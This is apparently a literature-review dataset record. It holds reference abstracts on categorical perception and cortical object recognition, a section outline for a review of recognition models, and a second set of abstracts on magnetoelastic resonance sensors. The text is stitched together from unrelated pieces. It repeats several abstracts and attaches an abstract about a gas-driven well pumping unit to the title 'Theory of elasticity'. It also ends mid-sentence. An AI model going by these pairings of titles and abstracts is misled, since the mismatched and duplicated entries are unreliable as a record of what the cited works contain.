Foundations of Categorical Perception: 1. Categoric perception: some psychophysical models R. E. Pastore 2. Beyond the categorical/continuous distinction: a psychophysical approach to processing modes N. A. MacMillan Part II. Categorical Perception of Speech: 3. Phonetic category boundaries are flexible B. H. Repp and A. M. Liberman 4. Auditory, articulatory, and learning explanations of categorical perception in speech S. Rosen and P. Howell 5. On infant speech perception and the acquisition of language P. D. Eimas, J. L. Miller and P. W. Jusczyk Part III. Models for Speech Categorical Perception: 6. Neural models of speech perception: a case history R. E. Remez 7. On the categorization of speech sounds R. L. Diehl and K. R. Kluender 8. Categorical partition: a fuzzy-logical model of categorization behaviour D. W. Massaro Part IV. Categorical Perception in Other Modalities and Other Species: 9. Perceptual categories in vision and audition M. H. Bornstein 10. Categorical perception of sound signals: facts and hypotheses from animal studies G. Ehret 11. A naturalistic view of categorical perception C. T. Snowden 12. The special-mechanisms debate in speech research: categorization tests on animals and infants P. K. Kuhl 13. Brain mechanisms in categorical perception M. Wilson Part V. Psychophysiological Indices of Categorical Perception: 14. Electrophysiological indices of categorical perception for speech D. L. Molfese 15. Evoked potentials and color-defined categories D. Regan Part VI. Higher-order Categories: 16. Categorization processes and categorical perception D. L. Medin and L. W. Barsalou 17. Developmental changes in category structure F. C. Keil and M. H. Kelly 18. Spatial categories: the perception and conceptualization of spatial relations E. Bialystok and D. R. Olson Part VII. Cognitive Foundations: 19. Category induction and representation S. Harnad Author index Subject index. --- paper_title: Global and fine information coded by single neurons in the temporal visual cortex paper_content: When we see a person's face, we can easily recognize their species, individual identity and emotional state. How does the brain represent such complex information? A substantial number of neurons in the macaque temporal cortex respond to faces1,2,3,4,5,6,7,8,9,10,11,12. However, the neuronal mechanisms underlying the processing ofcomplex information are not yet clear. Here we recorded the activity of single neurons in the temporal cortex of macaque monkeys while presenting visual stimuli consisting of geometric shapes, and monkey and human faces with various expressions. Information theory was used to investigate how well the neuronal responses could categorize the stimuli. We found that single neurons conveyed two different scales of facial information intheir firing patterns, starting at different latencies. Global information, categorizing stimuli as monkey faces, human faces or shapes, was conveyed in the earliest part of the responses. Fineinformation about identity or expression was conveyed later,beginning on average 51 ms after global information. We speculate that global information could be used as a ‘header’ to prepare destination areas for receiving more detailed information. --- paper_title: Neurophysiology of shape processing paper_content: Recent physiological findings are reviewed and synthesized into a model of shape processing and object recognition. Gestalt laws (e.g. good continuation, closure) and ‘non-accidental’ image properties (e.g. colinear terminating lines) are resolved in prestriate visual cortex, (areas V2 and V3) to support the extraction of 2D shape boundaries. Processing of shape continues along a ventral route through inferior temporal (IT) cortex where a vast catalogue of 2D shape primitives is established. Each catalogue entry is size-specific (±0.5 log scale unit) and orientation-specific (±45°), but can generalize over position (±150 degree2). Several shape components are used to activate representations of the approximate appearance of one object type at one view, orientation and size. Subsequent generalization, first over orientation and size, then over view, and finally over object sub-component, is achieved in the anterior temporal cortex by combining descriptions of the same object from different orientations and views, through associative learning. This scheme provides a route to 3D object recognition through 2D shape description and reduces the problem of perceptual invariance to a series of independent analyses with an associative link established between the outputs. The system relies on parallel processing with computations performed in a series of hierarchical steps with relatively simple operations at each stage. --- paper_title: View-based Models of 3D Object Recognition: Invariance to Imaging Transformations paper_content: This report describes the main features of a view-based model of object recognition. The model does not attempt to account for specific cortical structures; it tries to capture general properties to be expected in a biological architecture for object recognition. The basic module is a regularization network (RBF-like; see Poggio and Girosi, 1989; Poggio, 1990) in which each of the hidden units is broadly tuned to a specific view of the object to be recognized. The network output, which may be largely view independent, is first described in terms of some simple simulations. The following refinements and details of the basic module are then discussed: (1) some of the units may represent only components of views of the object--the optimal stimulus for the unit, its "center," is effectively a complex feature; (2) the units' properties are consistent with the usual description of cortical neurons as tuned to multidimensional optimal stimuli and may be realized in terms of plausible biophysical mechanisms; (3) in learning to recognize new objects, preexisting centers may be used and modified, but also new centers may be created incrementally so as to provide maximal view invariance; (4) modules are part of a hierarchical structure--the output of a network may be used as one of the inputs to another, in this way synthesizing increasingly complex features and templates; (5) in several recognition tasks, in particular at the basic level, a single center using view-invariant features may be sufficient. --- paper_title: Generalization to Novel Images in Upright and Inverted Faces paper_content: An image of a face depends not only on its shape, but also on the viewing position, illumination conditions, and facial expression. Any face recognition system must overcome the changes in face appearance induced by these factors. To assess the ability of human vision to genralize across changes in illumination and pose of faces, we studied the performance of subjects in a discrimination task with eiether upright or inverted faces. Subjects first learned to discriminate among images of three faces, taken under fixed viewing position an illumination. They were then tested on images of the same faces taken under all combinations of four illuminations and five viewing positions. For upright faces, we found remarkably good generalization to novel conditions. For inverted faces, the generalization to novel views was significantly worse, although the performance on the training images was similar in both cases. ---
Title: Computational Models of Object Recognition in Cortex: A Review Section 1: Object recognition is a difficult computational problem Description 1: Introduce the problem of object recognition, its complexities, and its significance in the context of intelligent machines and neuroscience. Section 2: Multiple tasks and strategies in object recognition Description 2: Discuss different levels of specificity in object recognition (identification vs. categorization) and compare perspectives from computer vision and neuroscience. Section 3: A continuum of recognition tasks along the trade-off between specificity and invariance Description 3: Explain the theoretical spectrum between identification and categorization, emphasizing the trade-off between specificity and invariance. Section 4: The same basic computational strategy can be used from identification to categorization Description 4: Describe how the same computational strategies can adapt to different recognition tasks, highlighting multiple strategies in biological vision. Section 5: Models and experiments Description 5: Emphasize the necessity of models in understanding recognition and planning new experiments with a focus on isolated objects and recent developments. Section 6: Models: Object-Centered and View-Based, Feedforward and Feedback Description 6: Review the major categories of models for object recognition, including object-centered vs. view-based models and feedforward vs. feedback models. Section 7: A basic module: feedforward and view-based Description 7: Examine the support for feedforward and view-based models from neurophysiological data and their relevance in immediate recognition of 3D objects. Section 8: Invariance and specificity Description 8: Analyze the central issue of the invariance-specificity trade-off and how different transformations affect recognition performance. Section 9: A basic module for identification and categorization: sparse population codes Description 9: Discuss the concept of sparse population codes in object recognition and how it supports identification and categorization. Section 10: A unified view Description 10: Consider the implementation of different recognition tasks using a unified architectural approach, including hierarchical categorization schemes. Section 11: Top-down and role of feedback Description 11: Explore the role of top-down processing in recognition, including learning phases, attention control, and model matching. Section 12: Learning Description 12: Describe the learning mechanisms across different cortical layers and the development of invariant features. Section 13: The time dimension Description 13: Address the importance of incorporating the temporal aspect of recognition, including object and eye movement dynamics. Section 14: Some key predictions Description 14: Detail critical predictions based on the reviewed models and the potential implications of their experimental validation or falsification.
Theory, Instrumentation and Applications of Magnetoelastic Resonance Sensors: A Review
21
--- paper_title: Wireless Magnetoelastic Resonance Sensors: A Critical Review paper_content: This paper presents a comprehensive review of magnetoelastic environmental sensor technology; topics include operating physics, sensor design, and illustrative applications. Magnetoelastic sensors are made of amorphous metallic glass ribbons or wires, with a characteristic resonant frequency inversely proportional to length. The remotely detected resonant frequency of a magnetoelastic sensor shifts in response to different physical parameters including stress, pressure, temperature, flow velocity, liquid viscosity, magnetic field, and mass loading. Coating the magnetoelastic sensor with a mass changing, chemically responsive layer enables realization of chemical sensors. Magnetoelastic sensors can be remotely interrogated by magnetic, acoustic, or optical means. The sensors can be characterized in the time domain, where the resonant frequency is determined through analysis of the sensor transient response, or in the frequency domain where the resonant frequency is determined from the frequency-amplitude spectrum of the sensor. --- paper_title: Characterization of nano-dimensional thin-film elastic moduli using magnetoelastic sensors paper_content: Abstract Application of magnetoelastic thick-film sensors to the measurement of thin-film elastic moduli is described in this study. An analytical model is derived, that relates the resonant frequency of a magnetoelastic sensor to the elasticity and density of an applied thin-film. Limits of the model are analyzed, and related to experimental measurements using thin-films of silver and aluminum. For 500 nm thick-films, the measured Young’s modulus of elasticity for Al and Ag is found to be within 1.6% of standard data. Using commercially available magnetoelastic sensors, the elasticity of coatings, approximately 30 nm thick, can readily be measured. --- paper_title: The frequency response of magnetoelastic sensors to stress and atmospheric pressure paper_content: Earlier work demonstrated that the characteristic resonant frequency of magnetoelastic thick-film sensors shifts linearly downwards in response to increasing atmospheric pressure. In this paper, the response mechanism is detailed and shown to be a function of both pressure and the way that the sensor is mechanically stressed. Stressing the sensor, in either the elastic or plastic regime, induces out-of-plane vibrations that act as a pressure-dependent damping force to the longitudinal sensor oscillations excited by the interrogation field. This damping force, in turn, acts to shift the resonant frequency of the magnetoelastic sensor lower in response to increasing pressure. --- paper_title: Magnetoelastic sensors in combination with nanometer-scale honeycombed thin film ceramic TiO2 for remote query measurement of humidity. paper_content: Ribbonlike magnetoelastic sensors can be considered the magnetic analog of an acoustic bell; in response to an externally applied magnetic field impulse the sensors emit magnetic flux with a characteristic resonant frequency. The magnetic flux can be detected external to the test area using a pick-up coil, enabling query remote monitoring of the sensor. The characteristic resonant frequency of a magnetoelastic sensor changes in response to mass loads. [L.D. Landau and E. M. Lifshitz, Theory of Elasticity, 3rd ed. (Pergamon, New York, 1986). p. 100].Therefore, remote query chemical sensors can be fabricated by combining the magnetoelastic sensors with a mass changing, chemically responsive layer. In this work magnetoelastic sensors are coated with humidity-sensitive thin films of ceramic, nanodimensionally porous TiO2 to make remote query humidity sensors. --- paper_title: Monitoring blood coagulation with magnetoelastic sensors. paper_content: The determination of blood coagulation time is an essential part of monitoring therapeutic anticoagulants. Standard methodologies for the measurement of blood clotting time require dedicated personnel and involve blood sampling procedures. A new method based on magnetoelastic sensors has been employed for the monitoring of blood coagulation. The ribbon-like magnetoelastic sensor oscillates at a fundamental frequency, which shifts linearly in response to applied mass loads or a fixed mass load of changing elasticity. The magnetoelastic sensors emit magnetic flux, which can be detected by a remotely located pick-up coil, so that no direct physical connections are required. During blood coagulation, the viscosity of blood changes due to the formation of a soft fibrin clot. In turn, this change in viscosity shifts the characteristic resonance frequency of the magnetoelastic sensor enabling real-time continuous monitoring of this biological event. By monitoring the signal output as a function of time, a distinct blood clotting profile can be seen. The relatively low cost of the magnetoelastic ribbons enables their use as disposable sensors. This, along with the reduced volume of blood required, make the magnetoelastic sensors well suited for at-home and point-of-care testing devices. --- paper_title: Remote query pressure measurement using magnetoelastic sensors paper_content: Two magnetostriction-based methods for measuring atmospheric pressure are presented. Each technique correlates changes in pressure with the characteristic resonant frequency of a magnetoelastic magnetostrictive thick-film sensor. In each case the sensor is monitored remotely, using an adjacently located pickup coil, without the use of physical connections to the sensor. --- paper_title: A remote query magnetoelastic pH sensor. paper_content: A remote query magnetoelastic pH sensor comprised of a magnetoelastic thick-film coated with a mass-changing pH-responsive polymer is described. In response to a magnetic query field the magnetoelastic sensor mechanically vibrates at a characteristic frequency that is inversely dependent upon the mass of the attached polymer layer. As the magnetoelastic sensor is magnetostrictive the mechanical vibrations of the sensor launch magnetic flux that can be detected remotely from the sensor using a pickup coil. The pH responsive copolymer is synthesized from 20 mol% of acrylic acid and 80 mol% of iso-octyl acrylate and then deposited onto a magnetoelastic film by dip-coating. For a 1 micrometer polymer coating upon a 30 micrometer thick Metglas [The Metglas alloys are a registered trademark of Honeywell Corporation. For product information see: http://www.electronicmaterials.com:80/businesses/sem/amorph/page5_1_2.htm.] alloy 2826MB magnetoelastic film between pH 5 and 9 the change in resonant frequency is linear, approximately 285 Hz/pH or 0.6%/pH. The addition of 10 mmol/l of KCl to the test solution decreases the sensitivity of the polymer approximately 4%. --- paper_title: A wireless micro-sensor for simultaneous measurement of pH, temperature, and pressure paper_content: In response to a magnetic field impulse, magnetostrictive magnetoelastic sensors mechanically vibrate. These vibrations can be detected in several ways: optically from the amplitude modulation of a reflected laser beam, acoustically using a microphone or hydrophone, and by using a pickup coil to detect the magnetic flux emitted from the sensor. Earlier work has shown that the resonant frequency of a magnetoelastic sensor shifts in response to different environmental parameters, including temperature, pressure, fluid flow velocity and mass loading, with each parameter determined in an otherwise constant environment. To extend the utility of the sensor technology in this work we report on the fabrication and application of a miniaturized array of four magnetoelastic sensors that enable the simultaneous remote query measurement of pH, temperature, and pressure from a passive, wireless platform. --- paper_title: Magnetoelastic Immunosensors: Amplified Mass Immunosorbent Assay for Detection of Escherichia coli O157:H7 paper_content: A mass-sensitive magnetoelastic immunosensor for detection of Escherichia coli O157:H7 is described, based on immobilization of affinity-purified antibodies attached to the surface of a micrometer-scale magnetoelastic cantilever. Alkaline phosphatase is used as a labeled enzyme to the anti-E. coli O157:H7 antibody, amplifying the mass change associated with the antibody−antigen binding reaction by biocatalytic precipitation of 5-bromo-4-chloro-3-indolyl phosphate in a pH 10.0 PBS solution. The detection limit of the biosensor is 102 E. coli O157:H7 cells/mL. A linear change in the resonance frequency of the biosensor was found to E. coli O157:H7 concentrations ranging from 102 to 106 cells/mL. --- paper_title: A remote query magnetostrictive viscosity sensor. paper_content: Magnetically soft, magnetostrictive metallic glass ribbons are used as in-situ remote query viscosity sensors. When immersed in a liquid, changes in the resonant frequency of the ribbon-like sensors are shown to correlate with the square root of the liquid viscosity and density product. An elastic wave model is presented that describes the sensor response as a function of the frictional forces acting upon the sensor surface. --- paper_title: Measurement of temperature and liquid viscosity using wireless magneto-acoustic/magneto-optical sensors paper_content: Remote query magneto-acoustic and magneto-optical sensors are used to measure liquid temperature, viscosity and density. Sensors comprising magnetoelastic Metglas(R) 2826MB thick-films, alloy composition Fe/sub 40/Ni/sub 38/Mo/sub 4/B/sub 18/, oscillate in response to an externally applied, time-varying magnetic field. The sensor oscillations are strongest at the characteristic mechanical resonant frequency of the sensor. Depending upon the physical geometry and surface roughness of the magnetoelastic films, the mechanical sensor-vibrations launch an acoustic wave that can be detected remotely using a hydrophone or microphone. Furthermore, the sensor oscillations act to modulate the intensity of a laser beam reflected from the sensor surface. The sensor vibrations were optically monitored using a photo detector placed in the path of a laser beam back-scattered off the sensor ribbon. Using a Fast Fourier Transform, the signal obtained in the time-domain from acoustical or optical detectors is converted into the frequency-domain from which the resonant frequency of the sensor is determined. The resonant frequency shifts linearly with temperature and, when immersed in a liquid, with the frictional damping forces associated with liquid viscosity and density, thus allowing a remote measurement of temperature and liquid viscosity. --- paper_title: A wireless, remote query glucose biosensor based on a pH-sensitive polymer paper_content: This paper describes a wireless, remote query glucose biosensor using a ribbonlike, mass-sensitive magnetoelastic sensor as the transducer. The glucose biosensor is fabricated by first coating the magnetoelastic sensor with a pH-sensitive polymer and upon it a layer of glucose oxidase (GOx). The pH-responsive polymer swells or shrinks, thereby changing mass, respectively, in response to increasing or decreasing pH values. The GOx-catalyzed oxidation of glucose produces gluconic acid, inducing the pH-responsive polymer to shrink, which in turn decreases the polymer mass. In response to a time-varying magnetic field, a magnetoelastic sensor mechanically vibrates at a characteristic resonance frequency, the value of which inversely depends on sensor mass loading. As the magnetoelastic films are magnetostrictive, the vibrations launch magnetic flux that can be remotely detected using a pickup coil. Hence, changes in the resonance frequency of a passive magnetoelastic transducer are detected on a remote query ... --- paper_title: Theory of elasticity paper_content: A walking beam pumping unit is provided for pumping liquid from wells having gas pressure therein. The unit is driven by gas pressure from the well reciprocating the piston of a pneumatic cylinder up and down to swing the walking beam correspondingly and pump the liquid from the well. Gas under pressure is directed from the wellhead through a two-way valve to the opposite ends of the hydraulic cylinder in alternating fashion, so the piston has power strokes in opposite directions. Each power stroke, besides moving the walking beam, serves to recompress the gas used for the preceding power stroke sufficiently to inject it into the sales line. The setting of the two-way valve is controlled by a pneumatic actuator supplied with gas under pressure from the wellhead and having a thimble valve responsive to the up and down movement of the walking beam by means of adjustable stops carried thereon. The horsehead is counter-balanced by weights or by a pneumatic cylinder attached to the horsehead and actuated by movement thereof to provide counter-balancing gas pressure. In one form of the invention, the counter-balancing gas pressure is stored in a hollow skid assembly. --- paper_title: A magnetoelastic bioaffinity-based sensor for avidin. paper_content: Abstract A magnetoelastic bioaffinity sensor coupled with biocatalytic precipitation is described for avidin detection. The non-specific adsorption characteristics of streptavidin on different functionalized sensor surfaces are examined. It is found that a biotinylated poly(ethylene glycol) (PEG) interface can effectively block non-specific adsorption of proteins. Coupled with the PEG immobilized sensor surface, alkaline phosphatase (AP) labeled streptavidin is used to track specific binding on the sensor. This mass-change-based signal is amplified by the accumulation on the sensor of insoluble products of 5-bromo-4-chloro-3-indolyl phosphate catalyzed by AP. The resulting mass loading on the sensor surface in turn shifts the resonance frequency of the magnetoelastic sensors, with an avidin detection limit of approximately 200 ng/ml. --- paper_title: Elastic modulus measurement of thin films coated onto magnetoelastic ribbons paper_content: A model is presented to describe the change of the resonant frequency of a magnetoelastic sensor when the sensor is coated with a material of given elasticity. With a mass load coated on the surface of the sensor, its characteristic resonant frequency changes depending on the ratio of the sound velocities in the sensor and the coating. A measurement technique is derived that allows the determination of Young's modulus of elasticity of thin film coatings, with thickness greater than approximately 75 nm, based on the measurement of mass and resonant frequency of a sensor before and after coating. Comparing the measurement to the model delivers the value of Young's modulus of elasticity for a coating of known density. --- paper_title: Remote query measurement of pressure, fluid-flow velocity, and humidity using magnetoelastic thick-film sensors paper_content: Abstract Free-standing magnetoelastic thick-film sensors have a characteristic resonant frequency that can be determined by monitoring the magnetic flux emitted from the sensor in response to a time varying magnetic field. This property allows the sensors to be monitored remotely without the use of direct physical connections, such as wires, enabling measurement of environmental parameters from within sealed, opaque containers. In this work, we report on application of magnetoelastic sensors to measurement of atmospheric pressure, fluid-flow velocity, temperature, and mass load. Mass loading effects are demonstrated by fabrication of a remote query humidity sensor, made by coating the magnetoelastic thick film with a thin layer of solgel deposited Al 2 O 3 that reversibly changes mass in response to humidity. --- paper_title: Simultaneous measurement of liquid density and viscosity using remote query magnetoelastic sensors paper_content: Earlier work [C. A. Grimes et al., Smart Mater. Struct. 8, 639, (1999)] has shown that upon immersion in liquid the resonant frequency of a magnetoelasticsensor shifts linearly in response to the square root of the liquid density and viscosity product. It is shown that comparison between a pair of magnetoelasticsensors with different degrees of surface roughness can be used to simultaneously determine the liquid density and viscosity. --- paper_title: Magnetoacoustic remote query temperature and humidity sensors paper_content: In response to an externally applied time-varying magnetic field, freestanding sensors made of magnetoelastic thick or thin films mechanically oscillate. These oscillations are strongest at the characteristic resonant frequency of the sensor. Depending upon the physical geometry and the surface roughness of the magnetoelastic sensor, these mechanical deformations launch an acoustic wave that can be detected remotely from the test area by a microphone. By monitoring changes in the characteristic resonant frequency of a magnetoacoustic sensor, multiple environmental parameters can be measured. In this work we report on the application of magnetoacoustic sensors for the remote query measurement of temperature, the monitoring of phase transitions and, in combination with a humidity-responsive mass-changing Al2O3 ceramic thin film, the in situ measurement of humidity levels. --- paper_title: A staphylococcal enterotoxin B magnetoelastic immunosensor. paper_content: A magnetoelastic immunosensor for detection of staphylococcal enterotoxin B (SEB) is described. The magnetoelastic sensor is a newly developed mass/elasticity-based transducer of high sensitivity having a material cost of approximately $0.001/sensor. Affinity-purified rabbit anti-SEB antibody was covalently immobilized on magnetoelastic sensors, of dimensions 6 mm x 2 mm x 28 microm. The affinity reaction of biotin-avidin and biocatalytic precipitation are used to amplify antigen-antibody binding events on the sensor surface. Horseradish peroxidase (HRP) and alkaline phosphatase were examined as the labeled enzymes to induce biocatalytic precipitation. The alkaline phosphatase substrate, 5-bromo-4-chloro-3-indolyl phosphate (BCIP) produces a dimer, which binds tightly to the sensor surface, inducing a change in sensor resonance frequency. The biosensor demonstrates a linear shift in resonance frequency with staphylococcal enterotoxin B concentration between 0.5 and 5 ng/ml, with a detection limit of 0.5 ng/ml. --- paper_title: A wireless magnetoelastic micro-sensor array for simultaneous measurement of temperature and pressure paper_content: Magnetoelastic thick film sensors mechanically deform when subjected to a magnetic field impulse, launching elastic waves within the sensor the magnitude of which is greatest at the mechanical resonant frequency. As the sensors are magnetostrictive, the mechanical deformations launch magnetic flux that can be detected remotely. The characteristic resonant frequency of a magnetoelastic sensor, which is a function of the length, density, elasticity and Poisson's ratio of the sensor material, changes in response to temperature, pressure, ambient flow rate and, in combination with a mass changing, chemically responsive layer different analyte concentrations. By using an array of such sensors different environmental parameters can be simultaneously determined in a complex environment; we have designed and fabricated such an array for the simultaneous measurement of temperature and pressure. --- paper_title: A wireless, remote query ammonia sensor. paper_content: Abstract This paper presents a wireless, remote query ammonia sensor comprised of a free-standing magnetoelastic thick-film coated with a polymer, poly(acrylic acid-co-isooctylacrylate), that changes mass in response to atmospheric ammonia concentration. The mass of the polymer layer modulates the resonant frequency the ferromagnetic magnetoelastic substrate, hence by monitoring the frequency response of the sensor, atmospheric NH 3 concentration can be determined remotely, without the need for physical connections to the sensor or specific alignment requirements. The effect of copolymer composition, polymer film thickness, and relative humidity level (RH) on the sensitivity of the sensor were investigated. The sensor linearly tracks ammonia concentration below 0.8 vol.%, and tracks higher concentrations logarithmically; within the linear calibration range, a 0.02 vol.% change in NH 3 concentration can be detected. --- paper_title: Design and application of a wireless, passive, resonant-circuit environmental monitoring sensor paper_content: Abstract A wireless, passive, remote query sensor platform is presented capable of monitoring the complex permittivity of a surrounding medium, temperature, humidity, and pressure. The sensor is a planar two-dimensional inductor–capacitor circuit, of scaleable-size, that resonates at a characteristic frequency the value of which is dependent upon the parameters of interest. The resonant frequency of the sensor is detected remotely with one or a pair of loop antennas by measuring the impedance or voltage spectrum of the antenna(s), with the environmental parameters of interest then calculated from the measured resonant frequency. The wireless, remote query nature of the platform enables the LC sensor to monitor the environmental conditions from within sealed opaque containers. The paper describes the operational principles, design criteria, illustrative applications, and performance limitations of the sensor platform. --- paper_title: A remote query magnetostrictive viscosity sensor. paper_content: Magnetically soft, magnetostrictive metallic glass ribbons are used as in-situ remote query viscosity sensors. When immersed in a liquid, changes in the resonant frequency of the ribbon-like sensors are shown to correlate with the square root of the liquid viscosity and density product. An elastic wave model is presented that describes the sensor response as a function of the frictional forces acting upon the sensor surface. --- paper_title: Measurement of temperature and liquid viscosity using wireless magneto-acoustic/magneto-optical sensors paper_content: Remote query magneto-acoustic and magneto-optical sensors are used to measure liquid temperature, viscosity and density. Sensors comprising magnetoelastic Metglas(R) 2826MB thick-films, alloy composition Fe/sub 40/Ni/sub 38/Mo/sub 4/B/sub 18/, oscillate in response to an externally applied, time-varying magnetic field. The sensor oscillations are strongest at the characteristic mechanical resonant frequency of the sensor. Depending upon the physical geometry and surface roughness of the magnetoelastic films, the mechanical sensor-vibrations launch an acoustic wave that can be detected remotely using a hydrophone or microphone. Furthermore, the sensor oscillations act to modulate the intensity of a laser beam reflected from the sensor surface. The sensor vibrations were optically monitored using a photo detector placed in the path of a laser beam back-scattered off the sensor ribbon. Using a Fast Fourier Transform, the signal obtained in the time-domain from acoustical or optical detectors is converted into the frequency-domain from which the resonant frequency of the sensor is determined. The resonant frequency shifts linearly with temperature and, when immersed in a liquid, with the frictional damping forces associated with liquid viscosity and density, thus allowing a remote measurement of temperature and liquid viscosity. --- paper_title: Correction for longitudinal mode vibration in thin slender beams paper_content: This letter reports on a correction to the theoretical prediction of longitudinal mode vibration in thin, slender beams. Thin magnetostrictive strips were fashioned from Metglas™ and subjected to a modulated magnetic field to determine resonant frequency and acoustic wave propagation speed. The results indicated that current analytical solutions were not adequate to predict behavior. Numerical simulations were performed that adjusted Poisson’s ratio until the acoustic wave speed matched that measured in the experiments. The results indicated that the current equations, formulated using the plane-strain modulus, should be modified by using the plane-stress or biaxial modulus. --- paper_title: Remote query measurement of pressure, fluid-flow velocity, and humidity using magnetoelastic thick-film sensors paper_content: Abstract Free-standing magnetoelastic thick-film sensors have a characteristic resonant frequency that can be determined by monitoring the magnetic flux emitted from the sensor in response to a time varying magnetic field. This property allows the sensors to be monitored remotely without the use of direct physical connections, such as wires, enabling measurement of environmental parameters from within sealed, opaque containers. In this work, we report on application of magnetoelastic sensors to measurement of atmospheric pressure, fluid-flow velocity, temperature, and mass load. Mass loading effects are demonstrated by fabrication of a remote query humidity sensor, made by coating the magnetoelastic thick film with a thin layer of solgel deposited Al 2 O 3 that reversibly changes mass in response to humidity. --- paper_title: Simultaneous measurement of liquid density and viscosity using remote query magnetoelastic sensors paper_content: Earlier work [C. A. Grimes et al., Smart Mater. Struct. 8, 639, (1999)] has shown that upon immersion in liquid the resonant frequency of a magnetoelasticsensor shifts linearly in response to the square root of the liquid density and viscosity product. It is shown that comparison between a pair of magnetoelasticsensors with different degrees of surface roughness can be used to simultaneously determine the liquid density and viscosity. --- paper_title: Magnetoacoustic remote query temperature and humidity sensors paper_content: In response to an externally applied time-varying magnetic field, freestanding sensors made of magnetoelastic thick or thin films mechanically oscillate. These oscillations are strongest at the characteristic resonant frequency of the sensor. Depending upon the physical geometry and the surface roughness of the magnetoelastic sensor, these mechanical deformations launch an acoustic wave that can be detected remotely from the test area by a microphone. By monitoring changes in the characteristic resonant frequency of a magnetoacoustic sensor, multiple environmental parameters can be measured. In this work we report on the application of magnetoacoustic sensors for the remote query measurement of temperature, the monitoring of phase transitions and, in combination with a humidity-responsive mass-changing Al2O3 ceramic thin film, the in situ measurement of humidity levels. --- paper_title: Magnetomechanical damping in amorphous ribbons with uniaxial anisotropy paper_content: We have investigated the magnetomechanical damping and the resonant amplitude of the longitudinal vibrations of amorphous ribbons with a uniaxial anisotropy induced transverse to the ribbon axis by magnetic field annealing. The damping and herewith the resonant amplitude are governed by eddy current losses. Yet, classical eddy current theory fails to describe the experimental results, in particular, when the sample is biased by a constant magnetic field. This failure ultimately originates in the commonly used assumption of an isotropic permeability tensor. This is not true in uniaxial ferromagnets where magnetization changes by rotation. Thus, within a domain, a change of magnetization along the ribbon axis is inevitably accompanied by a change of magnetization transverse to the ribbon axis. The latter produces excess eddy current losses which become increasingly important the more the equilibrium position of the magnetization vector is declined towards the ribbon axis by the bias field. Taking this into account, a straight forward calculation ends up in analytic expressions capable to describe correctly the experimental findings starting from the basic material parameters. --- paper_title: A wireless magnetoelastic micro-sensor array for simultaneous measurement of temperature and pressure paper_content: Magnetoelastic thick film sensors mechanically deform when subjected to a magnetic field impulse, launching elastic waves within the sensor the magnitude of which is greatest at the mechanical resonant frequency. As the sensors are magnetostrictive, the mechanical deformations launch magnetic flux that can be detected remotely. The characteristic resonant frequency of a magnetoelastic sensor, which is a function of the length, density, elasticity and Poisson's ratio of the sensor material, changes in response to temperature, pressure, ambient flow rate and, in combination with a mass changing, chemically responsive layer different analyte concentrations. By using an array of such sensors different environmental parameters can be simultaneously determined in a complex environment; we have designed and fabricated such an array for the simultaneous measurement of temperature and pressure. --- paper_title: Design and application of a wireless, passive, resonant-circuit environmental monitoring sensor paper_content: Abstract A wireless, passive, remote query sensor platform is presented capable of monitoring the complex permittivity of a surrounding medium, temperature, humidity, and pressure. The sensor is a planar two-dimensional inductor–capacitor circuit, of scaleable-size, that resonates at a characteristic frequency the value of which is dependent upon the parameters of interest. The resonant frequency of the sensor is detected remotely with one or a pair of loop antennas by measuring the impedance or voltage spectrum of the antenna(s), with the environmental parameters of interest then calculated from the measured resonant frequency. The wireless, remote query nature of the platform enables the LC sensor to monitor the environmental conditions from within sealed opaque containers. The paper describes the operational principles, design criteria, illustrative applications, and performance limitations of the sensor platform. --- paper_title: Characterization of nano-dimensional thin-film elastic moduli using magnetoelastic sensors paper_content: Abstract Application of magnetoelastic thick-film sensors to the measurement of thin-film elastic moduli is described in this study. An analytical model is derived, that relates the resonant frequency of a magnetoelastic sensor to the elasticity and density of an applied thin-film. Limits of the model are analyzed, and related to experimental measurements using thin-films of silver and aluminum. For 500 nm thick-films, the measured Young’s modulus of elasticity for Al and Ag is found to be within 1.6% of standard data. Using commercially available magnetoelastic sensors, the elasticity of coatings, approximately 30 nm thick, can readily be measured. --- paper_title: Theory of elasticity paper_content: A walking beam pumping unit is provided for pumping liquid from wells having gas pressure therein. The unit is driven by gas pressure from the well reciprocating the piston of a pneumatic cylinder up and down to swing the walking beam correspondingly and pump the liquid from the well. Gas under pressure is directed from the wellhead through a two-way valve to the opposite ends of the hydraulic cylinder in alternating fashion, so the piston has power strokes in opposite directions. Each power stroke, besides moving the walking beam, serves to recompress the gas used for the preceding power stroke sufficiently to inject it into the sales line. The setting of the two-way valve is controlled by a pneumatic actuator supplied with gas under pressure from the wellhead and having a thimble valve responsive to the up and down movement of the walking beam by means of adjustable stops carried thereon. The horsehead is counter-balanced by weights or by a pneumatic cylinder attached to the horsehead and actuated by movement thereof to provide counter-balancing gas pressure. In one form of the invention, the counter-balancing gas pressure is stored in a hollow skid assembly. --- paper_title: Elastic modulus measurement of thin films coated onto magnetoelastic ribbons paper_content: A model is presented to describe the change of the resonant frequency of a magnetoelastic sensor when the sensor is coated with a material of given elasticity. With a mass load coated on the surface of the sensor, its characteristic resonant frequency changes depending on the ratio of the sound velocities in the sensor and the coating. A measurement technique is derived that allows the determination of Young's modulus of elasticity of thin film coatings, with thickness greater than approximately 75 nm, based on the measurement of mass and resonant frequency of a sensor before and after coating. Comparing the measurement to the model delivers the value of Young's modulus of elasticity for a coating of known density. --- paper_title: Characterization of nano-dimensional thin-film elastic moduli using magnetoelastic sensors paper_content: Abstract Application of magnetoelastic thick-film sensors to the measurement of thin-film elastic moduli is described in this study. An analytical model is derived, that relates the resonant frequency of a magnetoelastic sensor to the elasticity and density of an applied thin-film. Limits of the model are analyzed, and related to experimental measurements using thin-films of silver and aluminum. For 500 nm thick-films, the measured Young’s modulus of elasticity for Al and Ag is found to be within 1.6% of standard data. Using commercially available magnetoelastic sensors, the elasticity of coatings, approximately 30 nm thick, can readily be measured. --- paper_title: Monitoring blood coagulation with magnetoelastic sensors. paper_content: The determination of blood coagulation time is an essential part of monitoring therapeutic anticoagulants. Standard methodologies for the measurement of blood clotting time require dedicated personnel and involve blood sampling procedures. A new method based on magnetoelastic sensors has been employed for the monitoring of blood coagulation. The ribbon-like magnetoelastic sensor oscillates at a fundamental frequency, which shifts linearly in response to applied mass loads or a fixed mass load of changing elasticity. The magnetoelastic sensors emit magnetic flux, which can be detected by a remotely located pick-up coil, so that no direct physical connections are required. During blood coagulation, the viscosity of blood changes due to the formation of a soft fibrin clot. In turn, this change in viscosity shifts the characteristic resonance frequency of the magnetoelastic sensor enabling real-time continuous monitoring of this biological event. By monitoring the signal output as a function of time, a distinct blood clotting profile can be seen. The relatively low cost of the 